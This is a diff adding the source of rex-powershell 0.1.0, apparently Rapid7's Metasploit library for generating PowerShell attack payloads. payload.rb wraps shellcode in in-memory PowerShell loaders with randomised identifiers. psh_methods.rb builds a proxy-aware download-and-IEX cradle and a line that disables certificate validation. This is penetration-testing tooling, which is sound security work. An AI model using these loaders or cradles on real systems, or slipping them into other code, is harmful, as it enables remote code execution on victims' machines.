rex-powershell 0.1.0

data/lib/rex/powershell/payload.rb

@@ -0,0 +1,78 @@
+# -*- coding: binary -*-
+require 'rex/random_identifier'
+
+module Rex
+module Powershell
+module Payload
+
+  def self.read_replace_script_template(template_path, filename, hash_sub)
+    template_pathname = File.join(template_path, filename)
+    template = ''
+    File.open(template_pathname, "rb") {|f| template = f.read}
+    template % hash_sub
+  end
+
+  def self.to_win32pe_psh_net(template_path, code)
+    rig = Rex::RandomIdentifier::Generator.new()
+    rig.init_var(:var_code)
+    rig.init_var(:var_kernel32)
+    rig.init_var(:var_baseaddr)
+    rig.init_var(:var_threadHandle)
+    rig.init_var(:var_output)
+    rig.init_var(:var_codeProvider)
+    rig.init_var(:var_compileParams)
+    rig.init_var(:var_syscode)
+    rig.init_var(:var_temp)
+
+    hash_sub = rig.to_h
+    hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
+
+    read_replace_script_template(template_path, "to_mem_dotnet.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
+  end
+
+  def self.to_win32pe_psh(template_path, code)
+    hash_sub = {}
+    hash_sub[:var_code] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_win32_func]	= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_payload] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_size] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_rwx] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_iter] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_syscode] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+
+    hash_sub[:shellcode] = Rex::Powershell.to_powershell(code, hash_sub[:var_code])
+
+    read_replace_script_template(template_path, "to_mem_old.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
+  end
+
+  #
+  # Reflection technique prevents the temporary .cs file being created for the .NET compiler
+  # Tweaked by shellster
+  # Originally from PowerSploit
+  #
+  def self.to_win32pe_psh_reflection(template_path, code)
+    # Intialize rig and value names
+    rig = Rex::RandomIdentifier::Generator.new()
+    rig.init_var(:func_get_proc_address)
+    rig.init_var(:func_get_delegate_type)
+    rig.init_var(:var_code)
+    rig.init_var(:var_module)
+    rig.init_var(:var_procedure)
+    rig.init_var(:var_unsafe_native_methods)
+    rig.init_var(:var_parameters)
+    rig.init_var(:var_return_type)
+    rig.init_var(:var_type_builder)
+    rig.init_var(:var_buffer)
+    rig.init_var(:var_hthread)
+
+    hash_sub = rig.to_h
+    hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
+
+    read_replace_script_template(template_path,
+                                 "to_mem_pshreflection.ps1.template",
+                                 hash_sub).gsub(/(?<!\r)\n/, "\r\n")
+  end
+
+end
+end
+end

data/lib/rex/powershell/psh_methods.rb

@@ -0,0 +1,93 @@
+# -*- coding: binary -*-
+
+module Rex
+module Powershell
+  ##
+  # Convenience methods for generating powershell code in Ruby
+  ##
+
+  module PshMethods
+    #
+    # Download file via .NET WebClient
+    #
+    # @param src [String] URL to the file
+    # @param target [String] Location to save the file
+    #
+    # @return [String] Powershell code to download a file
+    def self.download(src, target)
+      target ||= '$pwd\\' << src.split('/').last
+      %Q^(new-object System.Net.WebClient).DownloadFile("#{src}", "#{target}")^
+    end
+
+    #
+    # Uninstall app, or anything named like app
+    #
+    # @param app [String] Name of application
+    # @param fuzzy [Boolean] Whether to apply a fuzzy match (-like) to
+    #   the application name
+    #
+    # @return [String] Powershell code to uninstall an application
+    def self.uninstall(app, fuzzy = true)
+      match = fuzzy ? '-like' : '-eq'
+      %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
+    end
+
+    #
+    # Create secure string from plaintext
+    #
+    # @param str [String] String to create as a SecureString
+    #
+    # @return [String] Powershell code to create a SecureString
+    def self.secure_string(str)
+      %Q(ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$)
+    end
+
+    #
+    # Find PID of file lock owner
+    #
+    # @param filename [String] Filename
+    #
+    # @return [String] Powershell code to identify the PID of a file
+    #   lock owner
+    def self.who_locked_file(filename)
+      %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
+    end
+
+    #
+    # Return last time of login
+    #
+    # @param user [String] Username
+    #
+    # @return [String] Powershell code to return the last time of a user
+    #   login
+    def self.get_last_login(user)
+      %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
+    end
+
+    #
+    # Disable SSL Certificate verification
+    #
+    # @return [String] Powershell code to disable SSL verification
+    #   checks.
+    def self.ignore_ssl_certificate
+      '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
+    end
+
+    #
+    # Use the default system web proxy and credentials to download a URL
+    # as a string and execute the contents as PowerShell
+    #
+    # @param url [String] string to download
+    #
+    # @return [String] PowerShell code to download a URL
+    def self.proxy_aware_download_and_exec_string(url)
+      var = Rex::Text.rand_text_alpha(1)
+      cmd = "$#{var}=new-object net.webclient;"
+      cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();"
+      cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
+      cmd << "IEX $#{var}.downloadstring('#{url}');"
+      cmd
+    end
+  end
+end
+end

data/lib/rex/powershell/script.rb

@@ -0,0 +1,96 @@
+# -*- coding: binary -*-
+
+require 'forwardable'
+
+module Rex
+module Powershell
+  class Script
+    attr_accessor :code
+    attr_reader :functions, :rig
+
+    include Output
+    include Parser
+    include Obfu
+    # Pretend we are actually a string
+    extend ::Forwardable
+    # In case someone messes with String we delegate based on its instance methods
+    # eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
+    def_delegators :@code, :each_line, :strip, :chars, :intern, :chr, :casecmp, :ascii_only?, :<, :tr_s,
+                   :!=, :capitalize!, :ljust, :to_r, :sum, :private_methods, :gsub, :dump, :match, :to_sym,
+                   :enum_for, :display, :tr_s!, :freeze, :gsub!, :split, :rindex, :<<, :<=>, :+, :lstrip!,
+                   :encoding, :start_with?, :swapcase, :lstrip!, :encoding, :start_with?, :swapcase,
+                   :each_byte, :lstrip, :codepoints, :insert, :getbyte, :swapcase!, :delete, :rjust, :>=,
+                   :!, :count, :slice, :clone, :chop!, :prepend, :succ!, :upcase, :include?, :frozen?,
+                   :delete!, :chop, :lines, :replace, :next, :=~, :==, :rstrip!, :%, :upcase!, :each_char,
+                   :hash, :rstrip, :length, :reverse, :setbyte, :bytesize, :squeeze, :>, :center, :[],
+                   :<=, :to_c, :slice!, :chomp!, :next!, :downcase, :unpack, :crypt, :partition,
+                   :between?, :squeeze!, :to_s, :chomp, :bytes, :clear, :!~, :to_i, :valid_encoding?, :===,
+                   :tr, :downcase!, :scan, :sub!, :each_codepoint, :reverse!, :class, :size, :empty?, :byteslice,
+                   :initialize_clone, :to_str, :to_enum, :tap, :tr!, :trust, :encode!, :sub, :oct, :succ, :index,
+                   :[]=, :encode, :*, :hex, :to_f, :strip!, :rpartition, :ord, :capitalize, :upto, :force_encoding,
+                   :end_with?
+
+    def initialize(code)
+      @code = ''
+      @rig = Rex::RandomIdentifier::Generator.new
+
+      begin
+        # Open code file for reading
+        fd = ::File.new(code || '', 'rb')
+        while (line = fd.gets)
+          @code << line
+        end
+
+        # Close open file
+        fd.close
+      rescue Errno::ENAMETOOLONG, Errno::ENOENT
+        # Treat code as a... code
+        @code = code.to_s.dup # in case we're eating another script
+      end
+      @functions = get_func_names.map { |f| get_func(f) }
+    end
+
+    ##
+    # Class methods
+    ##
+
+    #
+    # Convert binary to byte array, read from file if able
+    #
+    # @param input_data [String] Path to powershell file or powershell
+    #   code string
+    # @param var_name [String] Byte array variable name
+    #
+    # @return [String] input_data as a powershell byte array
+    def self.to_byte_array(input_data, var_name = Rex::Text.rand_text_alpha(rand(3) + 3))
+      # File will raise an exception if the path contains null byte
+      if input_data.include? "\x00"
+        code = input_data
+      else
+        code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
+      end
+
+      code = code.unpack('C*')
+      psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
+      lines = []
+      1.upto(code.length - 1) do |byte|
+        if (byte % 10 == 0)
+          lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
+        else
+          lines.push ",0x#{code[byte].to_s(16)}"
+        end
+      end
+
+      psh << lines.join('') + "\r\n"
+    end
+
+    #
+    # Return list of code modifier methods
+    #
+    # @return [Array] Code modifiers
+    def self.code_modifiers
+      instance_methods.select { |m| m =~ /^(strip|sub)/ }
+    end
+  end # class Script
+end
+end

data/lib/rex/powershell/version.rb

@@ -0,0 +1,5 @@
+module Rex
+  module Powershell
+    VERSION = "0.1.0"
+  end
+end

data/rex-powershell.gemspec

@@ -0,0 +1,27 @@
+# coding: utf-8
+lib = File.expand_path('../lib', __FILE__)
+$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
+require 'rex/powershell/version'
+
+Gem::Specification.new do |spec|
+  spec.name          = "rex-powershell"
+  spec.version       = Rex::Powershell::VERSION
+  spec.authors       = ["David 'thelightcosine' Maloney"]
+  spec.email         = ["DMaloney@rapid7.com"]
+
+  spec.summary       = %q{Rex Powershell Utilities}
+  spec.description   = %q{Ruby Exploitation(Rex) library for generating/manipulating Powershell scripts}
+  spec.homepage      = "https://github.com/rapid7/rex-powershell"
+
+  spec.files         = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
+  spec.bindir        = "exe"
+  spec.executables   = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
+  spec.require_paths = ["lib"]
+
+  spec.add_development_dependency "bundler", "~> 1.12"
+  spec.add_development_dependency "rake", "~> 10.0"
+  spec.add_development_dependency "rspec", "~> 3.0"
+
+  spec.add_runtime_dependency 'rex-text'
+  spec.add_runtime_dependency 'rex-random_identifier'
+end

metadata

@@ -0,0 +1,213 @@
+--- !ruby/object:Gem::Specification
+name: rex-powershell
+version: !ruby/object:Gem::Version
+  version: 0.1.0
+platform: ruby
+authors:
+- David 'thelightcosine' Maloney
+autorequire: 
+bindir: exe
+cert_chain:
+- |
+  -----BEGIN CERTIFICATE-----
+  MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG
+  A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
+  b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw
+  MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i
+  YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT
+  aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ
+  jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp
+  xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz8kHp
+  1Wrjsok6Vjk4bwY8iGlbKk3Fp1S4bInMm/k8yuX9ifUSPJJ4ltbcdG6TRGHRjcdG
+  snUOhugZitVtbNV4FpWi6cgKOOvyJBNPc1STE4U6G7weNLWLBYy5d4ux2x8gkasJ
+  U26Qzns3dLlwR5EiUWMWea6xrkEmCMgZK9FGqkjWZCrXgzT/LCrBbBlDSgeF59N8
+  9iFo7+ryUp9/k5DPAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8E
+  BTADAQH/MB0GA1UdDgQWBBRge2YaRQ2XyolQL30EzTSo//z9SzANBgkqhkiG9w0B
+  AQUFAAOCAQEA1nPnfE920I2/7LqivjTFKDK1fPxsnCwrvQmeU79rXqoRSLblCKOz
+  yj1hTdNGCbM+w6DjY1Ub8rrvrTnhQ7k4o+YviiY776BQVvnGCv04zcQLcFGUl5gE
+  38NflNUVyRRBnMRddWQVDf9VMOyGj/8N7yy5Y0b2qvzfvGn9LhJIZJrglfCm7ymP
+  AbEVtQwdpf5pLGkkeB6zpxxxYu7KyJesF12KwvhHhm4qxFYxldBniYUr+WymXUad
+  DKqC5JlR3XC321Y9YeRq4VzW9v493kHMB65jUr9TU/Qr6cf9tveCX4XSQRjbgbME
+  HMUfpIBvFSDJ3gyICh3WZlXi/EjJKSZp4A==
+  -----END CERTIFICATE-----
+- |
+  -----BEGIN CERTIFICATE-----
+  MIIEKDCCAxCgAwIBAgILBAAAAAABL07hNVwwDQYJKoZIhvcNAQEFBQAwVzELMAkG
+  A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
+  b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw0xMTA0MTMxMDAw
+  MDBaFw0xOTA0MTMxMDAwMDBaMFExCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i
+  YWxTaWduIG52LXNhMScwJQYDVQQDEx5HbG9iYWxTaWduIENvZGVTaWduaW5nIENB
+  IC0gRzIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCyTxTnEL7XJnKr
+  NpfvU79ChF5Y0Yoo/ENGb34oRFALdV0A1zwKRJ4gaqT3RUo3YKNuPxL6bfq2RsNq
+  o7gMJygCVyjRUPdhOVW4w+ElhlI8vwUd17Oa+JokMUnVoqni05GrPjxz7/Yp8cg1
+  0DB7f06SpQaPh+LO9cFjZqwYaSrBXrta6G6V/zuAYp2Zx8cvZtX9YhqCVVrG+kB3
+  jskwPBvw8jW4bFmc/enWyrRAHvcEytFnqXTjpQhU2YM1O46MIwx1tt6GSp4aPgpQ
+  STic0qiQv5j6yIwrJxF+KvvO3qmuOJMi+qbs+1xhdsNE1swMfi9tBoCidEC7tx/0
+  O9dzVB/zAgMBAAGjgfowgfcwDgYDVR0PAQH/BAQDAgEGMBIGA1UdEwEB/wQIMAYB
+  Af8CAQAwHQYDVR0OBBYEFAhu2Lacir/tPtfDdF3MgB+oL1B6MEcGA1UdIARAMD4w
+  PAYEVR0gADA0MDIGCCsGAQUFBwIBFiZodHRwczovL3d3dy5nbG9iYWxzaWduLmNv
+  bS9yZXBvc2l0b3J5LzAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdsb2Jh
+  bHNpZ24ubmV0L3Jvb3QuY3JsMBMGA1UdJQQMMAoGCCsGAQUFBwMDMB8GA1UdIwQY
+  MBaAFGB7ZhpFDZfKiVAvfQTNNKj//P1LMA0GCSqGSIb3DQEBBQUAA4IBAQAiXMXd
+  PfQLcNjj9efFjgkBu7GWNlxaB63HqERJUSV6rg2kGTuSnM+5Qia7O2yX58fOEW1o
+  kdqNbfFTTVQ4jGHzyIJ2ab6BMgsxw2zJniAKWC/wSP5+SAeq10NYlHNUBDGpeA07
+  jLBwwT1+170vKsPi9Y8MkNxrpci+aF5dbfh40r5JlR4VeAiR+zTIvoStvODG3Rjb
+  88rwe8IUPBi4A7qVPiEeP2Bpen9qA56NSvnwKCwwhF7sJnJCsW3LZMMSjNaES2dB
+  fLEDF3gJ462otpYtpH6AA0+I98FrWkYVzSwZi9hwnOUtSYhgcqikGVJwQ17a1kYD
+  sGgOJO9K9gslJO8k
+  -----END CERTIFICATE-----
+- |
+  -----BEGIN CERTIFICATE-----
+  MIIEyjCCA7KgAwIBAgISESEyE8rNriS4+1dc8jOHEUL8MA0GCSqGSIb3DQEBBQUA
+  MFExCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWduIG52LXNhMScwJQYD
+  VQQDEx5HbG9iYWxTaWduIENvZGVTaWduaW5nIENBIC0gRzIwHhcNMTMxMDExMTUx
+  NTM4WhcNMTYxMDExMTUxNTM4WjBgMQswCQYDVQQGEwJVUzEWMBQGA1UECBMNTWFz
+  c2FjaHVzZXR0czEPMA0GA1UEBxMGQm9zdG9uMRMwEQYDVQQKEwpSYXBpZDcgTExD
+  MRMwEQYDVQQDEwpSYXBpZDcgTExDMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
+  CgKCAQEAhD//7+739c69hssg0mD6CXgf2JkuWTcU81dgD7aKcoEPqU8e1FseBvDW
+  /Q5fNK2H2NgHV/Msn18zXuK0PkaJXqj/vDsuKB3Hq0BiR2AwyDdEw8K5MK5bgQc2
+  tmcVtEAejRoy1Uv5UyfaAYAxG6zsma3buV1fjnEAC3VouRg4+EX/f65H/a6srntK
+  5Etp3D71k2f0oUl8dOqOmSsRJQQ5zSs4ktDvpjAmsvzoA+1svceLYU95mvQsIw2T
+  edpmibGMwGw/HmgV+YWBgF5UGvax6zbC2i6DF2YHnDfkNb8/1MEIaxOTAbJTazTK
+  8laCQOyay6L1BNPQKjZBgOge8LZq1wIDAQABo4IBizCCAYcwDgYDVR0PAQH/BAQD
+  AgeAMEwGA1UdIARFMEMwQQYJKwYBBAGgMgEyMDQwMgYIKwYBBQUHAgEWJmh0dHBz
+  Oi8vd3d3Lmdsb2JhbHNpZ24uY29tL3JlcG9zaXRvcnkvMAkGA1UdEwQCMAAwEwYD
+  VR0lBAwwCgYIKwYBBQUHAwMwPgYDVR0fBDcwNTAzoDGgL4YtaHR0cDovL2NybC5n
+  bG9iYWxzaWduLmNvbS9ncy9nc2NvZGVzaWduZzIuY3JsMIGGBggrBgEFBQcBAQR6
+  MHgwQAYIKwYBBQUHMAKGNGh0dHA6Ly9zZWN1cmUuZ2xvYmFsc2lnbi5jb20vY2Fj
+  ZXJ0L2dzY29kZXNpZ25nMi5jcnQwNAYIKwYBBQUHMAGGKGh0dHA6Ly9vY3NwMi5n
+  bG9iYWxzaWduLmNvbS9nc2NvZGVzaWduZzIwHQYDVR0OBBYEFE536JwFx9SpaEi3
+  w8pcq2GRFA5BMB8GA1UdIwQYMBaAFAhu2Lacir/tPtfDdF3MgB+oL1B6MA0GCSqG
+  SIb3DQEBBQUAA4IBAQAGpGXHtFLjTTivV+xQPwtZhfPuJ7f+VGTMSAAYWmfzyHXM
+  YMFYUWJzSFcuVR2YfxtbS45P7U5Qopd7jBQ0Ygk5h2a+B5nE4+UlhHj665d0zpYM
+  1eWndMaO6WBOYnqtNyi8Dqqc1foKZDNHEDggYhGso7OIBunup+N4sPL9PwQ3eYe6
+  mUu8z0E4GXYViaMPOFkqaYnoYgf2L+7L5zKYT4h/NE/P7kj7EbduHgy/v/aAIrNl
+  2SpuQH+SWteq3NXkAmFEEqvLJQ4sbptZt8OP8ghL3pVAvZNFmww/YVszSkShSzcg
+  QdihYCSEL2drS2cFd50jBeq71sxUtxbv82DUa2b+
+  -----END CERTIFICATE-----
+date: 2016-06-21 00:00:00.000000000 Z
+dependencies:
+- !ruby/object:Gem::Dependency
+  name: bundler
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.12'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.12'
+- !ruby/object:Gem::Dependency
+  name: rake
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '10.0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '10.0'
+- !ruby/object:Gem::Dependency
+  name: rspec
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.0'
+- !ruby/object:Gem::Dependency
+  name: rex-text
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+- !ruby/object:Gem::Dependency
+  name: rex-random_identifier
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+description: Ruby Exploitation(Rex) library for generating/manipulating Powershell
+  scripts
+email:
+- DMaloney@rapid7.com
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- ".gitignore"
+- ".rspec"
+- ".travis.yml"
+- CODE_OF_CONDUCT.md
+- Gemfile
+- LICENSE
+- README.md
+- Rakefile
+- bin/console
+- bin/setup
+- lib/rex/powershell.rb
+- lib/rex/powershell/command.rb
+- lib/rex/powershell/function.rb
+- lib/rex/powershell/obfu.rb
+- lib/rex/powershell/output.rb
+- lib/rex/powershell/param.rb
+- lib/rex/powershell/parser.rb
+- lib/rex/powershell/payload.rb
+- lib/rex/powershell/psh_methods.rb
+- lib/rex/powershell/script.rb
+- lib/rex/powershell/version.rb
+- rex-powershell.gemspec
+homepage: https://github.com/rapid7/rex-powershell
+licenses: []
+metadata: {}
+post_install_message: 
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubyforge_project: 
+rubygems_version: 2.4.8
+signing_key: 
+specification_version: 4
+summary: Rex Powershell Utilities
+test_files: []